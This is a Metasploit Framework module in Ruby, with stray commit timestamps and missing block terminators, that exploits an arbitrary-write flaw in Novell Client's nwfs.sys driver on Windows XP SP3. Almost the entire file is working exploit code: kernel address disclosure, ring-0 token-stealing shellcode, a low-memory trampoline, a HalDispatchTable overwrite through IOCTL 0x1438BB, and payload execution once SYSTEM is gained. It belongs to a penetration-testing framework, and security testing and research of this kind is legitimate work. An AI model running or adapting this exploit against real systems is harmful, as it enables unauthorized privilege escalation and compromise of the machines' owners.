2013-06-21 22:31:40 +00:00
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
require 'msf/core'
require 'rex'
require 'msf/core/post/common'
require 'msf/core/post/windows/priv'
2013-07-03 18:55:50 +00:00
require 'msf/core/post/windows/process'
2013-06-21 22:31:40 +00:00
class Metasploit3 < Msf :: Exploit :: Local
2013-08-30 21:28:54 +00:00
Rank = AverageRanking
include Msf :: Post :: Common
include Msf :: Post :: Windows :: Priv
include Msf :: Post :: Windows :: Process
def initialize ( info = { } )
super ( update_info ( info , {
'Name' = > 'Novell Client 4.91 SP4 nwfs.sys Local Privilege Escalation' ,
'Description' = > %q{
This module exploits a flaw in the nwfs . sys driver to overwrite data in kernel
space . The corruption occurs while handling ioctl requests with code 0x1438BB ,
where a 0x00000009 dword is written to an arbitrary address . An entry within the
HalDispatchTable is overwritten in order to execute arbitrary code when
NtQueryIntervalProfile is called . The module has been tested successfully on
Windows XP SP3 with Novell Client 4 . 91 SP4 .
} ,
'License' = > MSF_LICENSE ,
'Author' = >
'Ruben Santamarta' , # Vulnerability discovery and PoC
'juan vazquez' # MSF module
] ,
'Arch' = > ARCH_X86 ,
'Platform' = > 'win' ,
'SessionTypes' = > [ 'meterpreter' ] ,
'DefaultOptions' = >
'EXITFUNC' = > 'thread' ,
} ,
'Targets' = >
# Tested with nwfs.sys as installed with Novell Client 4.91 SP4
[ 'Automatic' , { } ] ,
[ 'Windows XP SP3' ,
'HaliQuerySystemInfo' = > 0x16bba , # Stable over Windows XP SP3 updates
'_KPROCESS' = > " \x44 " , # Offset to _KPROCESS from a _ETHREAD struct
'_TOKEN' = > " \xc8 " , # Offset to TOKEN from the _EPROCESS struct
'_UPID' = > " \x84 " , # Offset to UniqueProcessId FROM the _EPROCESS struct
'_APLINKS' = > " \x88 " # Offset to ActiveProcessLinks _EPROCESS struct
] ,
'References' = >
[ 'OSVDB' , '46578' ] ,
[ 'BID' , '30001' ] ,
[ 'URL' , 'http://support.novell.com/docs/Readmes/InfoDocument/patchbuilder/readme_5028543.html' ]
] ,
'DisclosureDate' = > 'Jun 26 2008' ,
'DefaultTarget' = > 0
} ) )
def add_railgun_functions
session . railgun . add_function (
'ntdll' ,
'NtAllocateVirtualMemory' ,
[ " DWORD " , " ProcessHandle " , " in " ] ,
[ " PBLOB " , " BaseAddress " , " inout " ] ,
[ " PDWORD " , " ZeroBits " , " in " ] ,
[ " PBLOB " , " RegionSize " , " inout " ] ,
[ " DWORD " , " AllocationType " , " in " ] ,
[ " DWORD " , " Protect " , " in " ]
] )
session . railgun . add_function (
'ntdll' ,
'NtDeviceIoControlFile' ,
[ " DWORD " , " FileHandle " , " in " ] ,
[ " DWORD " , " Event " , " in " ] ,
[ " DWORD " , " ApcRoutine " , " in " ] ,
[ " DWORD " , " ApcContext " , " in " ] ,
[ " PDWORD " , " IoStatusBlock " , " out " ] ,
[ " DWORD " , " IoControlCode " , " in " ] ,
[ " LPVOID " , " InputBuffer " , " in " ] ,
[ " DWORD " , " InputBufferLength " , " in " ] ,
[ " LPVOID " , " OutputBuffer " , " in " ] ,
[ " DWORD " , " OutPutBufferLength " , " in " ]
] )
session . railgun . add_function (
'ntdll' ,
'NtQueryIntervalProfile' ,
[ " DWORD " , " ProfileSource " , " in " ] ,
[ " PDWORD " , " Interval " , " out " ]
] )
session . railgun . add_dll ( 'psapi' ) if not session . railgun . dlls . keys . include? ( 'psapi' )
session . railgun . add_function (
'psapi' ,
'EnumDeviceDrivers' ,
'BOOL' ,
[ " PBLOB " , " lpImageBase " , " out " ] ,
[ " DWORD " , " cb " , " in " ] ,
[ " PDWORD " , " lpcbNeeded " , " out " ]
] )
session . railgun . add_function (
'psapi' ,
'GetDeviceDriverBaseNameA' ,
[ " LPVOID " , " ImageBase " , " in " ] ,
[ " PBLOB " , " lpBaseName " , " out " ] ,
[ " DWORD " , " nSize " , " in " ]
] )
def open_device ( dev )
invalid_handle_value = 0xFFFFFFFF
r = session . railgun . kernel32 . CreateFileA ( dev , " GENERIC_READ " , 0x3 , nil , " OPEN_EXISTING " , " FILE_ATTRIBUTE_READONLY " , 0 )
handle = r [ 'return' ]
if handle == invalid_handle_value
return nil
return handle
def find_sys_base ( drvname )
results = session . railgun . psapi . EnumDeviceDrivers ( 4096 , 1024 , 4 )
addresses = results [ 'lpImageBase' ] [ 0 .. results [ 'lpcbNeeded' ] - 1 ] . unpack ( " L* " )
addresses . each do | address |
results = session . railgun . psapi . GetDeviceDriverBaseNameA ( address , 48 , 48 )
current_drvname = results [ 'lpBaseName' ] [ 0 .. results [ 'return' ] - 1 ]
if drvname == nil
if current_drvname . downcase . include? ( 'krnl' )
return [ address , current_drvname ]
elsif drvname == results [ 'lpBaseName' ] [ 0 .. results [ 'return' ] - 1 ]
return [ address , current_drvname ]
return nil
def ring0_shellcode ( t )
restore_ptrs = " \x31 \xc0 " # xor eax, eax
restore_ptrs << " \xb8 " + [ @addresses [ " HaliQuerySystemInfo " ] ] . pack ( " L " ) # mov eax, offset hal!HaliQuerySystemInformation
restore_ptrs << " \xa3 " + [ @addresses [ " halDispatchTable " ] + 4 ] . pack ( " L " ) # mov dword ptr [nt!HalDispatchTable+0x4], eax
tokenstealing = " \x52 " # push edx # Save edx on the stack
tokenstealing << " \x53 " # push ebx # Save ebx on the stack
tokenstealing << " \x33 \xc0 " # xor eax, eax # eax = 0
tokenstealing << " \x64 \x8b \x80 \x24 \x01 \x00 \x00 " # mov eax, dword ptr fs:[eax+124h] # Retrieve ETHREAD
tokenstealing << " \x8b \x40 " + t [ '_KPROCESS' ] # mov eax, dword ptr [eax+44h] # Retrieve _KPROCESS
tokenstealing << " \x8b \xc8 " # mov ecx, eax
tokenstealing << " \x8b \x98 " + t [ '_TOKEN' ] + " \x00 \x00 \x00 " # mov ebx, dword ptr [eax+0C8h] # Retrieves TOKEN
tokenstealing << " \x8b \x80 " + t [ '_APLINKS' ] + " \x00 \x00 \x00 " # mov eax, dword ptr [eax+88h] <====| # Retrieve FLINK from ActiveProcessLinks
tokenstealing << " \x81 \xe8 " + t [ '_APLINKS' ] + " \x00 \x00 \x00 " # sub eax,88h | # Retrieve _EPROCESS Pointer from the ActiveProcessLinks
tokenstealing << " \x81 \xb8 " + t [ '_UPID' ] + " \x00 \x00 \x00 \x04 \x00 \x00 \x00 " # cmp dword ptr [eax+84h], 4 | # Compares UniqueProcessId with 4 (The System Process on Windows XP)
tokenstealing << " \x75 \xe8 " # jne 0000101e ======================
tokenstealing << " \x8b \x90 " + t [ '_TOKEN' ] + " \x00 \x00 \x00 " # mov edx,dword ptr [eax+0C8h] # Retrieves TOKEN and stores on EDX
tokenstealing << " \x8b \xc1 " # mov eax, ecx # Retrieves KPROCESS stored on ECX
tokenstealing << " \x89 \x90 " + t [ '_TOKEN' ] + " \x00 \x00 \x00 " # mov dword ptr [eax+0C8h],edx # Overwrites the TOKEN for the current KPROCESS
tokenstealing << " \x5b " # pop ebx # Restores ebx
tokenstealing << " \x5a " # pop edx # Restores edx
tokenstealing << " \xc2 \x10 " # ret 10h # Away from the kernel!
ring0_shellcode = restore_ptrs + tokenstealing
return ring0_shellcode
def fill_memory ( proc , address , length , content )
result = session . railgun . ntdll . NtAllocateVirtualMemory ( - 1 , [ address ] . pack ( " L " ) , nil , [ length ] . pack ( " L " ) , " MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN " , " PAGE_EXECUTE_READWRITE " )
if not proc . memory . writable? ( address )
vprint_error ( " Failed to allocate memory " )
return nil
vprint_good ( " #{ address } is now writable " )
result = proc . memory . write ( address , content )
if result . nil?
vprint_error ( " Failed to write contents to memory " )
return nil
vprint_good ( " Contents successfully written to 0x #{ address . to_s ( 16 ) } " )
return address
def disclose_addresses ( t )
addresses = { }
vprint_status ( " Getting the Kernel module name... " )
kernel_info = find_sys_base ( nil )
if kernel_info . nil?
vprint_error ( " Failed to disclose the Kernel module name " )
return nil
vprint_good ( " Kernel module found: #{ kernel_info [ 1 ] } " )
vprint_status ( " Getting a Kernel handle... " )
kernel32_handle = session . railgun . kernel32 . LoadLibraryExA ( kernel_info [ 1 ] , 0 , 1 )
kernel32_handle = kernel32_handle [ 'return' ]
if kernel32_handle == 0
vprint_error ( " Failed to get a Kernel handle " )
return nil
vprint_good ( " Kernel handle acquired " )
vprint_status ( " Disclosing the HalDispatchTable... " )
hal_dispatch_table = session . railgun . kernel32 . GetProcAddress ( kernel32_handle , " HalDispatchTable " )
hal_dispatch_table = hal_dispatch_table [ 'return' ]
if hal_dispatch_table == 0
vprint_error ( " Failed to disclose the HalDispatchTable " )
return nil
hal_dispatch_table -= kernel32_handle
hal_dispatch_table += kernel_info [ 0 ]
addresses [ " halDispatchTable " ] = hal_dispatch_table
vprint_good ( " HalDispatchTable found at 0x #{ addresses [ " halDispatchTable " ] . to_s ( 16 ) } " )
vprint_status ( " Getting the hal.dll Base Address... " )
hal_info = find_sys_base ( " hal.dll " )
if hal_info . nil?
vprint_error ( " Failed to disclose hal.dll Base Address " )
return nil
hal_base = hal_info [ 0 ]
vprint_good ( " hal.dll Base Address disclosed at 0x #{ hal_base . to_s ( 16 ) } " )
hali_query_system_information = hal_base + t [ 'HaliQuerySystemInfo' ]
addresses [ " HaliQuerySystemInfo " ] = hali_query_system_information
vprint_good ( " HaliQuerySystemInfo Address disclosed at 0x #{ addresses [ " HaliQuerySystemInfo " ] . to_s ( 16 ) } " )
return addresses
def exploit
vprint_status ( " Adding the railgun stuff... " )
if sysinfo [ " Architecture " ] =~ / wow64 /i
fail_with ( Failure :: NoTarget , " Running against WOW64 is not supported " )
elsif sysinfo [ " Architecture " ] =~ / x64 /
fail_with ( Failure :: NoTarget , " Running against 64-bit systems is not supported " )
my_target = nil
if target . name =~ / Automatic /
print_status ( " Detecting the target system... " )
os = sysinfo [ " OS " ]
print_status ( " #{ os . inspect } " )
if os =~ / windows xp /i
my_target = targets [ 1 ]
print_status ( " Running against #{ my_target . name } " )
my_target = target
if my_target . nil?
fail_with ( Failure :: NoTarget , " Remote system not detected as target, select the target manually " )
print_status ( " Checking device... " )
handle = open_device ( " \\ \\ . \\ nwfs " )
if handle . nil?
fail_with ( Failure :: NoTarget , " \\ \\ . \\ nwfs device not found " )
print_good ( " \\ \\ . \\ nwfs found! " )
print_status ( " Disclosing the HalDispatchTable and hal!HaliQuerySystemInfo addresses... " )
@addresses = disclose_addresses ( my_target )
if @addresses . nil?
session . railgun . kernel32 . CloseHandle ( handle )
fail_with ( Failure :: Unknown , " Filed to disclose necessary addresses for exploitation. Aborting. " )
print_good ( " Addresses successfully disclosed. " )
print_status ( " Storing the kernel stager on memory... " )
this_proc = session . sys . process . open
kernel_shell = ring0_shellcode ( my_target )
kernel_shell_address = 0x1000
result = fill_memory ( this_proc , kernel_shell_address , 0x1000 , kernel_shell )
if result . nil?
session . railgun . kernel32 . CloseHandle ( handle )
fail_with ( Failure :: Unknown , " Error while storing the kernel stager shellcode on memory " )
print_good ( " Kernel stager successfully stored at 0x #{ kernel_shell_address . to_s ( 16 ) } " )
print_status ( " Storing the trampoline to the kernel stager on memory... " )
trampoline = " \x90 " * 0x20 # nops
trampoline << " \x68 " # push opcode
trampoline << [ 0x1000 ] . pack ( " V " ) # address to push
trampoline << " \xc3 " # ret
trampoline_addr = 0x3
result = fill_memory ( this_proc , trampoline_addr , 0x1000 , trampoline )
if result . nil?
session . railgun . kernel32 . CloseHandle ( handle )
fail_with ( Failure :: Unknown , " Error while storing trampoline on memory " )
print_good ( " Trampoline successfully stored at 0x #{ trampoline_addr . to_s ( 16 ) } " )
print_status ( " Triggering the vulnerability, corrupting the HalDispatchTable... " )
magic_ioctl = 0x1438BB
ioctl = session . railgun . ntdll . NtDeviceIoControlFile ( handle , 0 , 0 , 0 , 4 , magic_ioctl , @addresses [ " halDispatchTable " ] + 0x4 , 0x10 , 0 , 0 )
session . railgun . kernel32 . CloseHandle ( handle )
print_status ( " Executing the Kernel Stager throw NtQueryIntervalProfile()... " )
result = session . railgun . ntdll . NtQueryIntervalProfile ( 1337 , 4 )
print_status ( " Checking privileges after exploitation... " )
if not is_system?
fail_with ( Failure :: Unknown , " The exploitation wasn't successful " )
print_good ( " Exploitation successful! " )
p = payload . encoded
print_status ( " Injecting #{ p . length . to_s } bytes to memory and executing it... " )
if execute_shellcode ( p )
print_good ( " Enjoy " )
fail_with ( Failure :: Unknown , " Error while executing the payload " )
2013-06-21 22:31:40 +00:00
= begin
[ * ] Corruption
. text : 0005512 E sub_5512E proc near ; CODE XREF : ioctl_handler_sub_2FE4C + 295 p
. text : 0005512 E ; sub_405C4 + 29 B p
. text : 0005512 E
. text : 0005512 E ms_exc = CPPEH_RECORD ptr - 18 h
. text : 0005512 E arg_0 = dword ptr 8
. text : 0005512 E
. text : 0005512 E push 8
. text : 00055130 push offset stru_79268
. text : 00055135 call __SEH_prolog
. text : 0005513 A xor eax , eax
. text : 0005513 C mov ecx , [ ebp + arg_0 ]
. text : 0005513 F mov ecx , [ ecx + 0 Ch ]
. text : 00055142 mov ecx , [ ecx + 60 h ]
. text : 00055145 mov ecx , [ ecx + 10 h ]
. text : 0005514 8 mov [ ebp + ms_exc . registration . TryLevel ] , eax
. text : 0005514 B mov dword ptr [ ecx ] , 9 / / Corruption
= end